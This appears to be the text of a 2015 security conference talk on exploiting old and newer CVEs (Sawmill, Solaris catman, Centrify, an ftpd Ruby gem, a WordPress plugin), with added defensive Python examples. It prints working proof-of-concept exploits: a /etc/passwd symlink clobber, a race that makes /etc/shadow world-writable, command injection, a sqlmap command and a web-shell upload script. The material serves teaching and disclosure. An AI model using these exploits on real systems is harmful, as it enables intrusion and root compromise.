Fun with Exploits Old and New
How software is expected to behave, how it really behaves and how we can exploit it
Larry W. Cashdollar
11/13/2015
V1.9
Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 100+ Vulnerabilities discovered
• Formerly Unix Systems Administrator 17 years
• Penetration Tester Back in Late 90s
• Enjoy Writing and Breaking Code
• This is my second time speaking in public
Terminology
• CVE – Common Vulnerabilities and Exposures
• Root shell – gaining access to the administrative user on a Unix system
• Web shell – a web based shell used to access the system via HTTP
• Vulnerability – A flaw in a piece of software
• PoC – Proof of Concept
What is this all about?
• Concepts
• Methodologies
• Mind set
• How can I break this?
• Think like a hacker
Why bother hacking stuff?
• Improves software security
• Improves stability
• It’s like solving a puzzle
• Can be a lot of fun
• Improves your skills
• And……..
Exploiting a vulnerability you found feels like
Some common Vulnerabilities
• LFI (Local File Inclusion)
• RFI (Remote File Inclusion)
• RCE (Remote Command Execution)
• Race Condition
• SQL Injection
• XSS (Cross Site Scripting)
• Command Injection
Concepts
• Unchecked User Input
• User Input is expected to behave
• Abuse Program Flow
• Unintended functionality
• Abuse software privilege
Examples: Old
IRIX Midikeys: CVE-1999-0765
CVE-1999-0765: setuid root binary abuse
• Binary executes with root privileges
• Allows modification of sensitive system files
Exploit CVE-1999-0765
• Open /etc/passwd as a .wav file
• Or export WINEDITOR=/usr/X11/bin/xterm
Sawmill LFI & weak encryption CVE-2000-0589 & 0588
• Log analysis server listens on port 8987
• LFI can read the first line of any world-readable file
• Admin password stored in a local file
• Admin password encrypted with a custom algorithm
Exploiting CVE-2000-0589 & 0588
• $ curl http://192.168.1.65:8987/sawmill?rfcf+%22/etc/sawmill/adminpwd.db%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
• Returns the encrypted password Am@duZw
• Simple substitution cipher
• Wrote code to decrypt it… for my Palm Pilot IIIxe
PoC for CVE-2000-0589 & 0588
#include <stdio.h>
#include <string.h>

/* Plaintext alphabet and the substitution table Sawmill used to "encrypt"
   the admin password: encode[i] is the ciphertext character for alpha[i]. */
char *alpha  = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|";
char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{
  int x, y;
  char cypher[128];

  if (argc < 2) {
    fprintf (stderr, "usage: %s <encrypted password>\n", argv[0]);
    return 1;
  }

  /* strncpy does not guarantee termination; force it. */
  strncpy (cypher, argv[1], sizeof cypher - 1);
  cypher[sizeof cypher - 1] = '\0';

  /* Reverse the substitution: find each ciphertext character in encode
     and print the plaintext character at the same index of alpha. */
  for (x = 0; x < strlen (cypher); x++) {
    for (y = 0; y < strlen (encode); y++)
      if (cypher[x] == encode[y]) {
        printf ("%c", alpha[y]);
        break;
      }
  }

  printf ("\n\" could also be a space [ ]\n");
  return 0;
}
• Decrypted password was ‘wookie’
• Access to modify administrative control panel
• Developer gave me a free license 
Solaris catman file clobbering vulnerability CVE-2000-0095
• Creates files in /tmp insecurely
• Uses guessable filenames
• Doesn’t check to see if the file already exists
• Creates files in /tmp as /tmp/sman_PID
• We can guess the next filename and symlink it to /etc/passwd
PoC
#!/usr/local/bin/perl -w
# http://vapid.dhs.org
$clobber = "/etc/passwd";   # file to clobber
$X = getpgrp();             # starting guess for catman's PID
$Xc = $X;                   # constant: lower bound of the guessed range
$Y = $X + 1000;             # constant: upper bound of the guessed range

# Pre-create a symlink for each of the next 1000 likely PIDs, so that
# whichever /tmp/sman_PID catman picks already points at $clobber.
while ($X < $Y) {
    print "Linking /tmp/sman_$X to $clobber :";
    # Change $clobber to what you want to clobber.
    if (symlink ($clobber, "/tmp/sman_$X")) {
        print "Success\n";
    } else {
        print "failed, Busy system?\n";
    }
    $X = $X + 1;
}

# Watch /tmp and see if catman is executed in time.
while (1) {
    $list = "/usr/bin/ls -l /tmp | grep sman | grep root |";
    open (LIST, $list) or die "can't open ls...\n";
    while (<LIST>) {
        @args = split "_", $_;
        chop ($args[1]);
        if ($args[1] >= $Xc && $args[1] <= $Y) {
            print "Looks like pid $args[1] is the winner\n cleaning....\n";
            `/usr/bin/rm -f /tmp/sman*`;
            exit (1);
        }
    }
    close (LIST);
}
Exploit Results
• /etc/passwd overwritten with the contents of sman_pid
• System hosed
Exploits: New
Centrify CVE-2012-6348 /tmp race condition local root
• Administrative control daemon for system management
• Creates a file in /tmp as centrify.cmd.0
• Executes that file as shell script!
• Executes as root!
CVE-2012-6348 PoC
Wins race condition 50% of the time:
$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0; done
After the system is refreshed via administrative control job:
$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
CVE-2012-6348 Better PoC
• Wins race condition 100% of the time
• Written in C
• Uses inotify to detect file creation and modification
• Too long to display here
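Both the catman bug and the Centrify bug come down to a privileged process trusting a predictably named path in /tmp. The following Python example is added here (it is not code from the talk, from Solaris or from Centrify) to show the pattern on the defending side: a predictable name, a writer that follows whatever is already there, and the two fixes that refuse a pre-planted symlink (O_CREAT|O_EXCL, and mkstemp with an unpredictable name). Everything runs inside a scratch directory; the "passwd" file and the PID 1234 are constructed stand-ins.

```python
import os
import tempfile

# Added example: the /tmp naming pattern behind CVE-2000-0095 and
# CVE-2012-6348, beside the open() flags that defeat a planted symlink.
# All paths are created inside a throwaway directory.


def predictable_tmp_path(tmpdir, pid):
    """The vulnerable naming scheme: fixed prefix plus a guessable number."""
    return os.path.join(tmpdir, f"sman_{pid}")


def write_unsafe(path, data):
    """What catman did: open for writing and trust whatever sits at the path.
    If a symlink was planted there first, its *target* is truncated and
    overwritten with our data."""
    with open(path, "w") as f:
        f.write(data)


def write_safe(path, data):
    """O_CREAT|O_EXCL fails with EEXIST if anything (file or symlink) already
    exists at the path; O_NOFOLLOW additionally refuses symlinks outright."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def write_mkstemp(tmpdir, data):
    """The idiomatic fix: mkstemp picks an unpredictable name, creates it with
    O_EXCL and mode 0600, and returns the already-open descriptor."""
    fd, path = tempfile.mkstemp(prefix="sman_", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def _read(path):
    with open(path) as f:
        return f.read()


def demo():
    """Plant a symlink the way the PoC does, then try each writer."""
    results = {}
    with tempfile.TemporaryDirectory() as tmpdir:
        victim = os.path.join(tmpdir, "passwd")       # stands in for /etc/passwd
        original = "root:x:0:0:root:/root:/bin/sh\n"  # constructed content
        with open(victim, "w") as f:
            f.write(original)

        planted = predictable_tmp_path(tmpdir, 1234)  # attacker guessed the PID
        os.symlink(victim, planted)

        try:
            write_safe(planted, "privileged output\n")
            results["safe_refused"] = False
        except FileExistsError:
            results["safe_refused"] = True
        results["victim_intact_after_safe"] = _read(victim) == original

        created = write_mkstemp(tmpdir, "privileged output\n")
        results["mkstemp_new_name"] = created != planted and os.path.isfile(created)
        results["victim_intact_after_mkstemp"] = _read(victim) == original

        write_unsafe(planted, "privileged output\n")
        results["unsafe_clobbered_victim"] = _read(victim) == "privileged output\n"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same rule covers the Centrify case from the other direction: a privileged daemon should never execute or read a file from a world-writable directory by a fixed name; it should create the file itself with mkstemp (or in a directory only it can write) and keep the descriptor it got back rather than re-opening the path.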
Ftpd ruby gem command injection CVE-2013-2512
• FTP server developed in ruby
• Code examination reveals remote command injection
def ls(ftp_path, option)
  path = expand_ftp_path(ftp_path)
  dirname = File.dirname(path)
  filename = File.basename(path)
  command = [
    'ls',
    option,
    filename,            # <-- unsanitized user controlled input
    '2>&1',
  ].compact.join(' ')
  if File.exists?(dirname)   # <-- file has to exist to exec ls command
    list = Dir.chdir(dirname) do
      `#{command}`           # <-- passed to shell here
    end
    # (remainder of the method not shown on the slide)
  end
end
CVE-2013-2512 PoC
$ ftp localhost
Connected to localhost.
220 ftpd
Name (localhost:root): anonymous
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
* I already created the filename foobar by uploading a file
ftp> ls foobar;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
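The gem's mistake is building one string for the shell out of the client's file name. As an added example (Python, not the ftpd gem's code), here is that shape beside a listing that never involves a shell: the name is validated as a single path component and the directory is read through the OS API, so `foobar;id` is rejected before anything runs. The option allowlist, the name pattern and the `foobar` file are assumptions constructed for the demo.

```python
import os
import re
import subprocess
import tempfile

# Added example: the shell-string pattern from CVE-2013-2512 beside a
# listing that uses the OS API directly.

# One path component only: no '/', no shell metacharacters, and no leading
# '-' so the name can never be parsed as an ls option.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._][A-Za-z0-9._-]*$")
_ALLOWED_OPTIONS = {None, "-l"}   # constructed allowlist for the demo


def ls_unsafe(dirname, option, filename):
    """The vulnerable shape: user input joined into one string for /bin/sh,
    so 'foobar;id' is two commands."""
    command = " ".join(c for c in ["ls", option, filename, "2>&1"] if c)
    return subprocess.run(command, shell=True, cwd=dirname,
                          capture_output=True, text=True).stdout


def validate_name(filename):
    """Accept only a plain file name; reject '.', '..', separators, metachars."""
    if filename in (".", "..") or not _SAFE_NAME.match(filename):
        raise ValueError(f"rejected listing name: {filename!r}")
    return filename


def ls_safe(dirname, option, filename):
    """Listing without a shell: the client's string is only ever used as a
    path component, and 'option' must come from a fixed set."""
    if option not in _ALLOWED_OPTIONS:
        raise ValueError(f"rejected option: {option!r}")
    target = os.path.join(dirname, validate_name(filename))
    if not os.path.lexists(target):
        return []
    if os.path.isdir(target):
        base, names = target, sorted(os.listdir(target))
    else:
        base, names = dirname, [filename]
    if option == "-l":
        return [f"{os.lstat(os.path.join(base, n)).st_size:>8} {n}" for n in names]
    return names


def demo():
    """Exercise both listings against a constructed directory."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, "foobar"), "w").close()
        # A harmless marker stands in for the 'id' from the slide.
        results["unsafe_ran_injected"] = "INJECTED" in ls_unsafe(
            d, None, "foobar; echo INJECTED")
        results["safe_lists_file"] = ls_safe(d, None, "foobar") == ["foobar"]
        results["safe_long_listing"] = ls_safe(d, "-l", "foobar") == ["       0 foobar"]
        for bad in ("foobar;id", "../etc", "-rf", "$(id)"):
            try:
                ls_safe(d, None, bad)
                results[f"rejects {bad}"] = False
            except ValueError:
                results[f"rejects {bad}"] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

If an external program really is needed, the next best form is `subprocess.run(["ls", "-l", "--", name], ...)` with an argument list: no shell parses the string, and the `--` stops a name beginning with `-` from being read as an option. Validating the name is still worthwhile, because `ls` will otherwise happily follow `../`.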
wp-powerplaygallery vulnerable SQL injection code CVE-2015-5599
// $_REQUEST['albumid'] and $_REQUEST['name'] are concatenated into the
// statement unescaped; albumid is not even quoted.
$query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date`)
          VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
$wpdb->query($query);
Blind SQLi Exploit
• Sqlmap
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql --level 5 --risk 3
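The unquoted `albumid` above is why a blind probe works: the database evaluates whatever expression is placed there. The example below is added here (Python with an in-memory SQLite table, not the plugin's code) to show the string-built INSERT beside a parameterised one. The table is a constructed subset of `pp_images`, and the probe payloads are constructed for the demo.

```python
import sqlite3

# Added example: the concatenated INSERT from CVE-2015-5599 beside a
# parameterised one, against a constructed subset of the pp_images table.

SCHEMA = """
CREATE TABLE pp_images (
    id          INTEGER PRIMARY KEY,
    category_id INTEGER,
    title       TEXT,
    status      INTEGER
)"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def insert_unsafe(conn, albumid, name):
    """The plugin's shape: request values concatenated into the statement.
    albumid is unquoted, so any SQL expression is accepted in its place."""
    query = ("INSERT INTO pp_images (category_id, title, status) VALUES ("
             + albumid + ",'" + name + "',1)")
    conn.execute(query)
    return query


def insert_safe(conn, albumid, name):
    """Check the type, then bind with placeholders: the driver sends values
    separately from the SQL text, so they can never become syntax."""
    try:
        album = int(albumid)
    except (TypeError, ValueError):
        raise ValueError(f"albumid must be an integer, got {albumid!r}") from None
    conn.execute(
        "INSERT INTO pp_images (category_id, title, status) VALUES (?, ?, 1)",
        (album, name),
    )


def rows(conn):
    return conn.execute(
        "SELECT category_id, title FROM pp_images ORDER BY id").fetchall()


def demo():
    conn = fresh_db()
    # Boolean-based blind probe of the kind sqlmap automates: the stored
    # value (or the response it causes) reveals whether the condition held.
    insert_unsafe(conn, "(SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END)", "probe true")
    insert_unsafe(conn, "(SELECT CASE WHEN 1=2 THEN 1 ELSE 0 END)", "probe false")
    # The same payload through the safe path is rejected by the type check...
    try:
        insert_safe(conn, "(SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END)", "x")
        rejected = False
    except ValueError:
        rejected = True
    # ...and a quote-breaking title is stored as inert text.
    insert_safe(conn, "4", "x'); DROP TABLE pp_images; --")
    return rejected, rows(conn)


if __name__ == "__main__":
    rejected, stored = demo()
    print("payload rejected by insert_safe:", rejected)
    for row in stored:
        print(row)
```

In WordPress the equivalent of the placeholder call is `$wpdb->prepare()` with `%d` for the album id and `%s` for the strings; the point is the same, the values never pass through the SQL parser as text.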
wp-powerplaygallery vulnerable RFI code CVE-2015-5681
$targetDir = $upload_dir['basedir'] . '/power_play/' . $_REQUEST['albumid'] . '_uploadfolder';
$cleanupTargetDir = true; // Remove old files
$maxFileAge = 5 * 3600; // Temp file age in seconds

// Create target dir
if (!file_exists($targetDir)) {
    @mkdir($targetDir);
}
...
// Read binary input stream and append it to temp file
if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
}
...
// $out is the destination file, named from the client-supplied 'name'
// with no extension or content check (not shown on the slide)
while ($buff = fread($in, 4096)) {
    fwrite($out, $buff);
}
RFI Exploit Requirements
• POST request
• Variable albumid must point at an existing album in the database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains the payload with its local full path
• name variable contains our filename
PoC Exploit
<?php
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
// albumid must be an existing album; the '@' prefix makes curl send the file as a multipart upload
$post = array('albumid' => '4', 'name' => 'shell.php', 'file' => '@' . $file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
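The upload handler accepts any file under any client-chosen name inside a web-served directory, which is all the PoC above needs. As an added example (Python, not the plugin's code), here are the checks the handler lacks: an integer album id, an extension allowlist tied to the file's magic bytes, a random server-side name, and an exclusive create. The `<albumid>_uploadfolder` layout comes from the slide; the allowed types, the PNG sample and the assumption that `upload_root` lives outside the web root are constructed for the demo.

```python
import os
import secrets
import tempfile

# Added example: the validation missing from CVE-2015-5681's upload.php,
# written as a standalone handler.

# Extension allowlist with the file signature each one must carry.
ALLOWED_TYPES = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}

PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # constructed, not a real image


def validate_upload(albumid, client_name, head):
    """Return (album_id, server_side_name) or raise ValueError.
    'head' is the first few bytes of the upload body."""
    try:
        album = int(albumid)          # "4 OR 1=1" and "../x" fail here
    except (TypeError, ValueError):
        raise ValueError(f"albumid must be an integer: {albumid!r}") from None
    base = os.path.basename(client_name)       # drop any path the client sent
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not any(head.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise ValueError("file content does not match its extension")
    # Never reuse the client's name on disk: with a random name the uploader
    # cannot predict, and therefore cannot request, the path of their file.
    return album, secrets.token_hex(16) + ext


def store_upload(upload_root, albumid, client_name, data):
    """Write to upload_root/<album>_uploadfolder/<random><ext>. upload_root is
    assumed to sit outside the web root (or be served with script execution
    disabled), which is the other half of the fix."""
    album, stored = validate_upload(albumid, client_name, data[:8])
    target_dir = os.path.join(upload_root, f"{album}_uploadfolder")
    os.makedirs(target_dir, mode=0o750, exist_ok=True)
    path = os.path.join(target_dir, stored)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo():
    """Run constructed uploads through the checks."""
    results = {}
    samples = [
        ("shell.php", b"<?php echo 'x'; ?>"),        # wrong extension
        ("shell.php.png", b"<?php echo 'x'; ?>"),    # right extension, wrong bytes
        ("photo.png", PNG_SAMPLE),                   # genuine-looking image
    ]
    for name, body in samples:
        try:
            validate_upload("4", name, body[:8])
            results[name] = "accepted"
        except ValueError:
            results[name] = "rejected"
    with tempfile.TemporaryDirectory() as root:
        path = store_upload(root, "4", "../../evil.png", PNG_SAMPLE)
        results["stored_in_album_dir"] = (
            os.path.dirname(path) == os.path.join(root, "4_uploadfolder"))
        results["name_not_client_controlled"] = not path.endswith("evil.png")
        with open(path, "rb") as f:
            results["content_preserved"] = f.read() == PNG_SAMPLE
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The magic-byte check is what defeats the double-extension trick; the random name and the out-of-webroot location are what make a successful upload useless to the attacker even if a check is wrong, since nothing they wrote can be reached as a URL and executed.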
Questions?
• larry0@me.com
• http://www.vapidlabs.com
• Twitter @_larry0

Mais conteúdo relacionado

Mais procurados

Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
How to do everything with PowerShell
How to do everything with PowerShellHow to do everything with PowerShell
How to do everything with PowerShellJuan Carlos Gonzalez
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
Ansible tips & tricks
Ansible tips & tricksAnsible tips & tricks
Ansible tips & tricksbcoca
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Jun Hong Kim
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 

Mais procurados (20)

Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec Defense
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
 
How to do everything with PowerShell
How to do everything with PowerShellHow to do everything with PowerShell
How to do everything with PowerShell
 
Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortana
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrieval
 
Ansible tips & tricks
Ansible tips & tricksAnsible tips & tricks
Ansible tips & tricks
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 

Destaque

Bab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan KomputerBab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan Komputernurmayabadriatulj
 
Social Selling - An Introduction
Social Selling - An IntroductionSocial Selling - An Introduction
Social Selling - An IntroductionAndrew Moloney
 
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づくブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...統計的独立性と低ランク行列分解理論に基づくブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...Daichi Kitamura
 
Self driving cars -
Self driving cars - Self driving cars -
Self driving cars - Hany G. Amer
 

Destaque (10)

Media (24)
Media (24)Media (24)
Media (24)
 
Bab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan KomputerBab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan Komputer
 
Freaks
FreaksFreaks
Freaks
 
Media (4)
Media (4)Media (4)
Media (4)
 
Social Selling - An Introduction
Social Selling - An IntroductionSocial Selling - An Introduction
Social Selling - An Introduction
 
Reebok strategy
Reebok strategyReebok strategy
Reebok strategy
 
Bahan ajar fisika elastisitas
Bahan ajar fisika elastisitasBahan ajar fisika elastisitas
Bahan ajar fisika elastisitas
 
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づくブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...統計的独立性と低ランク行列分解理論に基づくブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
 
Self driving cars -
Self driving cars - Self driving cars -
Self driving cars -
 
Colgate brand image
Colgate brand imageColgate brand image
Colgate brand image
 

Semelhante a Fun with Exploits Old and New: Software Behavior and Exploitation

24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAsKellyn Pot'Vin-Gorman
 
PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnSandro Zaccarini
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Yuriko IKEDA
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with AnsibleRayed Alrashed
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Xavier Ashe
 
Efficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line KeystrokesEfficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line KeystrokesSeth Miller
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018Mandi Walls
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopMandi Walls
 
Introduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release updateIntroduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release updateAlex Pop
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Ilya Haykinson
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)ÇözümPARK
 
Virtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetVirtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetOmar Reygaert
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasag20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasaggarrett honeycutt
 

